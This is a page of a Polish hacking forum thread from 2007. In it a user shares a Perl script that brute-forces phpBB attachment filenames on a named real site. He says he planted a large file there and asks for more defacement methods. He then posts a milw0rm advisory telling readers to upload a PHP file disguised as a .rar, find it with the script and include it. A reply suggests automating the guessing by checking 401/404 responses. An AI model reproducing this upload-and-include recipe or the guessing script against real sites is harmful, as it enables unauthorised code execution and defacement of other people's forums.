Strona 3 z 4 PierwszyPierwszy 1234 OstatniOstatni
Pokaż wyniki 21 do 30 z 31

Temat: sql inj

  1. #21
    Avatar gogulas
    gogulas jest offline killboy powerhead
    Zarejestrowany
    Sep 2007
    Skąd
    Tu
    Postów
    1,236

    Domyślnie

    Heh, pamietam ze z tym katalog wyzej probowalem, ale jakos inaczej i nie wychodzilo, teraz zadzialalo, thnx.
    Jak zwykle robie coś prawie dobrze, czyli całkiem źle

    napisalem sobie skrypcik do szukania tego pliku lol_xxx.rar, a wylasciwie wygenerowanie listy z potencjalnymi nazywami:
    Kod:
    #!/usr/bin/perl
    
    for ($a = 100; $a < 999; ++$a)
    {
      print "iexplore www.goleniow.zhp.pl/forum/files/hh_$a.rar\n";
    }
    odpalilem z parametrem, skrypt.pl>>pliki.bat
    plik pliki.bat wrzucilem do c:\Prog files\IE, odpalilem i po kolei otwierala sie strona po stronie, do mnie nalezalo tylko klikac na krzyzyk i czekaz az trafi

    Niestety nie dalo rady defacnac (pewnie wszystko na 750), ale utowrzyc "hacked.txt" (~100MB) juz tak moja pierwsza w zyciu ingerencja w czyjas strone :-) oczywiscie autora poinformowalem i juz sobie to załatał

    thnx all

    Zna ktos jeszcze jakies metody na deface? :P
    http://gogulas.yoyo.pl/h.gif

  2. #22
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Kod:
    #!/usr/bin/perl
    use strict;
    
    for (my $cnt=0; $cnt <= 999; $cnt++) {
      printf("iexplore www.goleniow.zhp.pl/forum/files/hh_%03d.rar\n", $cnt);
    }
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  3. #23
    Avatar gogulas
    gogulas jest offline killboy powerhead
    Zarejestrowany
    Sep 2007
    Skąd
    Tu
    Postów
    1,236

    Domyślnie

    Hmmm, a napiszesz jeszcze dlaczego printf i %03d?
    http://gogulas.yoyo.pl/h.gif

  4. #24
    Avatar GSG-9
    GSG-9 jest offline Shapeshifter
    Zarejestrowany
    Jul 2007
    Skąd
    C:\Perl\bin
    Postów
    1,578

  5. #25
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    printf() wyswietla na ekran a sprintf() zapisuje wynik do zmiennej...
    %03d - 3 cyfry szerokosci, uzupelnione zerem z przodu jesli jest taka potrzeba
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  6. #26
    Avatar gogulas
    gogulas jest offline killboy powerhead
    Zarejestrowany
    Sep 2007
    Skąd
    Tu
    Postów
    1,236

    Domyślnie

    Hehe, poszlo na milw0rm.com, dostalem maila zwrotnego z zapytaniem na jakich wersjach to dziala bo w pierwszym liscie tego nie napisalem,

    Kod:
    phpBB forum (all versions) uploadet file finder
    
    # created by tqm & gogulas(at)wp(dot)pl _hack.pl_
    
    # when you upload a file in phpBB forum the deflaut url for this file is:
    # localhost/forum/files/yourfilename_xxx.yyy
    # where xxx is random number and yyy is extension
    # just rename your php file to rar execution 
    # (or any other repsected by the forum) and upload
    # here is a script to find this file:
    
    
    #!/usr/bin/perl
    use strict;
    
    for (my $cnt=0; $cnt <= 999; $cnt++) {
      printf("iexplore www.forum.com/forum/files/nameoffile_%03d.yyy\n", $cnt);
    }
    
    
    # run with parametr script.pl>>files.bat
    # move files.bat to c:\program files\internet explorer\
    # run it and keep closing IE windows until you shoot the corret one
    # then you can include it or anything else :)
    hehe, jak to zamieszcza to oficjalnie przejde na poziom "regular lame lvl 2"
    mocno nakaleczylem j. angielski?
    http://gogulas.yoyo.pl/h.gif

  7. #27
    Avatar GSG-9
    GSG-9 jest offline Shapeshifter
    Zarejestrowany
    Jul 2007
    Skąd
    C:\Perl\bin
    Postów
    1,578

    Domyślnie

    powiem tyle - gz

    uploaded a nie uploadet w 1 linii
    na regular lame lvl3 wlam sie do nasa i zamow darmowa pizze
    Ostatnio edytowane przez GSG-9 : 10-28-2007 - 14:10

  8. #28
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Ja bym tego nie wyslal no ale... niech bedzie...
    Po pierwsze to nie exploit tylko generator listy plikow a po drugie ten skrypt nie robi nawer polowy roboty - mozna go napisac aby robil calosc - bez pomocy IE i to byloby kolejne kilka linijek raptem. Tak czy inaczej powodzenia.

    Perl Powered of course
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  9. #29
    Avatar gogulas
    gogulas jest offline killboy powerhead
    Zarejestrowany
    Sep 2007
    Skąd
    Tu
    Postów
    1,236

    Domyślnie

    Eh, skrobnij jak mozesz,
    tylko nie wiadomo jak sie zachowa bo bat czekal az zamkne poprzednie okno przegladarki dopiero wtedy otwaral nastepne...

    poleccie mi jakas fajna ksiazke o perlu, cos co upoluje w pdfie..

    /edit
    bez pomocy IE?
    jesli katalog /files jest zablokowany (htaccess chyba) to nie bedzie pokazywal czy plik jest czy tez nie, nawet jesli trafisz, mozna sie jednak polapac po subtelnej roznicy w reakcji przegladarki...

    /edit2
    Ja tego nie nazywam exploitem
    Ostatnio edytowane przez gogulas : 10-28-2007 - 14:55
    http://gogulas.yoyo.pl/h.gif

  10. #30
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    W Perlu nie ma problemu z pobieraniem stron WWW i to na wiecej niz jeden sposob - mozesz probowac pobrac plik - jeden za drugim i patrzec czy dostaniesz content czy 401/404. W Perlu mozna nawet sterowac zachowaniem przegladarki z poziomu skryptu - otworz taki URL, napisz to na klawiaturze, potwierdz ta opcje w pytaniu JavaScript, itd.

    Ja w ten sposob zrobilem dla naszej ekipy pobieranie raportow z systemu jednego z partnerow - odpala IE (strona dziala TYLKO z IE), loguje usera, przelazi przez cale menu z prawie 200 roznych raportow, pobiera co trzeba i zapisuje w osobnych plikach uzywajac 'save link as'... Nasz ksiegowy odpala kompa, dwuklik na ikonce i idzie zrobic sobie kawe - zanim wroci, komplet raportow czeka w nowym folderze.

    Co do ksiazek - nie polece nic w jezyku Polskim bo dawno nic nie mialem w reku... choc tlumaczenia tego co ponizej widzialem.

    1. Programming Perl - 2nd edition (gdzies juz widzialem 3 wydanie - tzw. Camel Book - wielblad na okladce)
    2. Perl Cookbook - 2nd edition (analizowac problemy i rozwiazania)
    3. Learning Perl - 4th edition (tzw. Lama Book - lama na okladce)

    Mam wszystkie na papierze po angielsku oraz gdzies u rodzicow po polsku choc nieco starsze wydania. Wydawnictwo O'Reilly oczywiscie.

    btw - temat ksiazek omawialem dokladnie jakis czas temu.
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

Podobne wątki

  1. Excel -> SQL
    By TQM in forum Perl/Python/TCL/Prolog
    Odpowiedzi: 8
    Autor: 04-18-2011, 16:25
  2. sql injection
    By ble34 in forum Security
    Odpowiedzi: 7
    Autor: 06-13-2007, 16:45
  3. ADOdb a SQL Injection
    By prawie jak haker in forum Hacking
    Odpowiedzi: 1
    Autor: 06-10-2007, 12:35
  4. pomocy z zapytaniem SQL :)
    By mendi in forum Newbie - dla początkujących!
    Odpowiedzi: 2
    Autor: 04-29-2007, 13:55
  5. zastrzyki sql
    By ble34 in forum Newbie - dla początkujących!
    Odpowiedzi: 20
    Autor: 11-04-2006, 23:14

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj